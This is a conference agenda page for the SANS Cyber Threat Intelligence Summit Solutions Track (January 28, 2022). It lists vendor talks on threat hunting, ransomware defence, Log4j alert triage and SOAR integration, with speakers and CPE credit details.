Cyber Threat Intelligence Summit Solutions Track 2022

FREE SANS Cyber Threat Intelligence Summit | Jan 27th & 28th | Live Online

Chair & Subject Matter Expert: Ismael Valenzuela

Threat Intelligence can be defined as the ‘Art of Taking the Adversary by Surprise’. Yes, anticipating and mitigating surprises in the form of cyberattacks is the primary mission of a practical threat intelligence program. Achieving that goal requires a proactive approach, one that provides answers to critical questions like:

  • What threat actors are most likely to cause an impact in my organization?
  • What are their motivation, goals, and capabilities?
  • How do they behave and what arsenal of cyber-weapons (malicious software) is available to them to achieve those goals?
  • And more importantly, are you ready to defend against them? How can we communicate, share, and translate this knowledge into actionable countermeasures that result in improving an organization’s cyber defense capabilities?

>>> Checkout the other talks by registering for the SANS Cyber Threat Intelligence Summit and Bonus Session!

>>> Stay up to date on upcoming Summits & Forums and get connected with thousands of industry professionals by joining the 2022 Solutions Forums Workspace & Mailing List!

Download a copy of the presentations here!



Anomali_Logos_Anomali Full Color Primary - NEW.pngLogoLockup_Horz_RGB_Blue_190103.pngCorelight_Transparent.pngCS_Logo_2022_In-Line_All-Red_RGB.pngCyberRes_MF_Red.pngHorizontal_Logo.jpgPRIMARY_LOGO_Dragos_Logo_RGB_Transparent.pngExtraHop Networks logoMorphisec-Logo-Horizontal_(RGB_-_Color_Black).pngnozomi-networks-logo-color.pngPalo Alto Unit 42 logorapid7.pngreversing-labs.pngNEW_LOGO.jpgthreatconnect-signature.png

Attendee Information

At this year’s Cyber Threat Intelligence Summit, you’ll have the chance to learn, connect, and share with thousands of cybersecurity professionals in attendance from around the globe. No matter your background or skill level, you’ll walk away from CTI Summit with interesting perspectives and case studies that challenge CTI assumptions and result in a shift in your understanding.

Continuing Professional Education (CPE) Credits are earned by participation in the event!

  • 6 CPEs are earned each day you attend the CTI Summit
  • 6 CPEs are earned for attending the CTI Solutions Track on Jan 28th
  • 1 CPE is earned for attending the CTI Bonus Session on Jan 27th

Threat Intelligence Bonus Session will be a technical session that will cover specific advancement in adversary profiling combined a view of the sophistication of techniques being used, combined with an example of how advanced threat intelligence can combat this modern threat.

Stay up to date on upcoming Summits & Forums and get connected with thousands of industry professionals by joining the 2022 Solutions Forums Workspace & Mailing List!

Agenda | Friday, January 28, 2022 | 10:00 AM - 5:30 PM EST



10:00 AM

Welcome & Opening Remarks

Ismael Valenzuela, SANS Senior Instructor

10:15 AM

Threat Hunting by Clustering Big Data

There is a limit to the amount of information that humans can process. Even the most sophisticated organizations may struggle with the sheer amount of data generated from modern security systems – Hence the need for tools and techniques to transform the vast amount of data into manageable information for human consumption. As an example, we’d like to walk through on using "big data" analysis tools (apache spark) and techniques, while threat hunting, to group large amounts of suspicious events for human analysis. This technique may be useful to organizations of all sizes to handle large amounts of different data efficiently, or it could inspire some ideas to improve existing tools.

Tiago Pereira, Technical Leader, Security Research, Cisco Talos

10:50 AM

Five Lessons for Integrating OT Threat Intelligence

Using and integrating threat intelligence is difficult. Integrating threat intelligence from a non-standard domain like OT/ICS is even harder. Sergio Caltagirone will discuss 5 lessons from his 20 years’ experience consuming and producing threat intelligence as well as advising 100s of intel customers to make their cybersecurity mission better and faster than before. This is not the “best practices” you’ve seen before but 5 pragmatic lessons forged in real cybersecurity challenges around the world.

Sergio Caltagirone, VP of Threat Intelligence, Dragos, Inc.

11:25 AM


11:40 AM

How to Shift from Static to Enriched Dynamic Threat Intelligence to STOP Ransomware

Ransomware attacks are escalating, occurring every eleven seconds with ransoms averaging almost $2M and remediation costs exceeding $4M. To combat these attacks, security professionals rely on threat intelligence feeds from a variety of sources. This information is often combined with a threat intelligence platform (TIP) or similar solution to correlate and analyze the latest information, evaluate security defenses and strategies, and prioritize actions to mitigate risks. Unfortunately, most intelligence feeds provide static Indicators of Compromise (IOCs) that are no longer adequate against today’s sophisticated attacks. A new technology has emerged called Moving Target Defense (MTD) that provides enriched dynamic threat intelligence to improve your ability to prevent ransomware attacks before they cause severe damage. By attending this solutions track, you will learn:

• How static analysis and typical hash, domain, and URL intelligence is now far less relevant
• Why static IOC feeds fail to provide analysts with actionable intel against tailored moving target attacks
• Why dynamic runtime threat feeds are required to determine which applications to scan and when
• What is MTD and how it generates byte patterns that provide dynamic threat intelligence to prevent ransomware attacks

Nadav Lorber, Security Research Team Leader, Morphisec
Bill Reed, Director, Morphisec

12:15 PM

Software Supply Chain Threats and the Adversary’s Attack Lifecycle

The purpose of this presentation is to bring to light the ever-present nature of software supply chain vulnerabilities through the review of three use cases: Log4j, the MS Exchange hacks, and Sunburst. In addition to reviewing these use cases, this presentation will apply each of these use cases within a framework that is designed to help defenders better understand the adversary’s ability to leverage software supply chain attacks as part of their larger attack lifecycle.

Jason Rivera, Director – Strategic Threat Advisory Group, Global, CrowdStrike

12:50 PM


1:00 PM

Tales from the Trenches

To be resilient against today’s cybersecurity threats, you need to be able to stay ahead of the attackers. Utilizing strategic threat intelligence to understand the adversaries allows organizations to make informed changes to people, processes, technology, and governance that strengthen their security posture and mitigate the damage from potential attackers.

With our threat intelligence, incident response, and product development teams working together, Palo Alto Networks sees attacks from a unique perspective. During this session, Jen will share an inside view of the latest cyber threats and how the attack groups we track are impacting the current cybersecurity landscape.

Jen Miller-OsbornDeputy Director of Threat Intelligence, Unit 42, Palo Alto Networks

1:35 PM

Five Ways to Expel Ransomware Before they Spring the Trap

Ransomware has evolved and time may not be on your side. Once inside, adversaries are acting faster, moving laterally to accumulate enough data to ensure that you will pay—but intruders following the ransomware playbook have needs that cause them to risk detection. Every time they take a step, you have an opportunity to regain the advantage—if you know what to look for. Intrusions are a terrifying thing to consider, but they don’t spell doom: Visibility and response inside the perimeter are your best hope to prevent crippling damage from the ransomware menace. In this demo-filled session, we’ll show you how to spot indicators that leave modern ransomware exposed, giving you the opportunity to shut down the extortionists before they do real damage:

  •  Enumerating targets in your environment 
  •  Moving laterally toward your valuables 
  •  Escalating domain privileges inside encrypted channels 
  •  Phoning home over noisy DNS 
  •  Staging data exfiltration for second-phase extortion

Don Shin, Sr. Manager, ExtraHop

2:10 PM


2:20 PM

Hi-Fi CTI : Latest Methods for Using High Fidelity CTI to Head-off Ransomware Attacks

The plague of ransomware continued to grow in 2021 with attacks on oil pipelines, payroll systems, managed service provider software, and reports indicating there were over 700 million attempted ransomware attacks. The resulting costs to businesses and the time lost by security and IT teams was higher than ever before. Ransomware is too sophisticated and too diverse to succumb to any “silver bullet” security solution or tactic. To stand up to ransomware groups, therefore, it is essential that organizations develop an in-depth understanding of a ransomware group’s tooling, capabilities, and behaviors leading up to, during and after a ransomware infection. Cyber Threat Intelligence tradecraft is uniquely positioned to aid organizations to accomplish that. 

 Join this session to learn how you can leverage Threat Intelligence in your TIP or SOAR platform to reduce the time to detection of malware infections and potentially head off ransomware attacks. We'll be covering topics such as: 

  • Why CTI leads to better Ransomware preparation
  • Understanding the Ransomware Lifecycle 
  • High Profile Cases w/ Common Attack Regressions 
  • The Do's and Don'ts - Operationalizing CTI using TIP & SOAR

Ali N. Khan, Solution Demand Manager Threat Intelligence, ReversingLabs

2:55 PM
Log4j: Separating the Exploits from the Noise

Attackers have already found thousands of potential ways to obfuscate their log4j attacks, which are sweeping the Internet at breakneck speed. SOCs protecting still-vulnerable assets have a duty to chase down every alert for it that pops up - which are coming in at a rate of tens or hundreds of thousands of times a day for larger enterprises. This talk will discuss how a data-driven strategy can automate that insurmountable task into a process that quickly reveals systems that actually responded to the attack - letting teams focus on the alerts that matter the most.

Alex Kirk, Global Principal Engineer, Corelight

3:30 PM
Operationalizing Threat Intelligence to Automate Threat Response

Deltas between the threat intelligence and SecOps functions as part of the broader cybersecurity team are real.

 More than half of security practitioners state that cross-team collaboration is a strain for them to be effective in their jobs, while 76% report they don’t have the access to the data they need - this creates silos.

The movement toward an intelligence-driven security organization will take a seismic shift in thinking to where intelligence is considered THE fundamental component of their cyber programs; where focused collaboration produces the most critical insights; and hyper-automation is applied to streamline threat response at-scale. 

Despite enormous strides last year in this area of cybersecurity, organizations still struggle to: 

  • Curate the right threat intelligence that matters most to their business
  • Correlate intelligence with other signals for an optimized threat response
  • Share the intelligence and insights in an efficient way to funnel into action

This presentation will articulate a clear strategy that organizations can implement that’s designed up-level the use of intelligence to power threat response and bridge the gaps between threat intelligence and SecOps. Experts will articulate core use cases to through maturity-based model and will provide a technical demo for attendees.
Neal Dennis
Threat Intelligence Specialist, Cyware
Thomas Bain, Vice President, Cyware

4:05 PM


4:15 PM

Top Use Cases for Integrating Threat Intelligence with SOAR

Join Siemplify's Senior Solutions Architect, Harrison Parker to learn strategies to help overcome challenges facing security professionals and why integrating threat intelligence and SOAR is critical for an effective SecOps strategy. In this session, you will learn the basics and benefits of SOAR + TIP, the top 4 use cases, and we will finish with a demo.

Harrison Parker, Senior Solutions Architect, Siemplify

4:50 PM

Key Functionalities of a Modern Cyber Threat Intelligence Program

Everyone knows security is overloaded work wise – not everyone understands what that means. Cyber Threat Intelligence (CTI) is typically very technical so how can you convince the teams setting business objectives and allocating resources (for budget) of what the cybersecurity priorities should be? A modern CTI program needs to show value to the business because it will help solve some of the major problems we’re seeing in TI programs today (such as lack of resources or lack of data). Part of this includes bridging the gap between threat and risk to ensure your operational strategy aligns with the overall business objectives. This session is going to help you identify how to move your CTI program into one that shows the business value of what you’re doing already today!

Jerry Caponera, VP Cyber Risk Strategy, ThreatConnect, Inc.

5:25 PM

Wrap-Up and Closing Remarks

Ismael Valenzuela, SANS Senior Instructor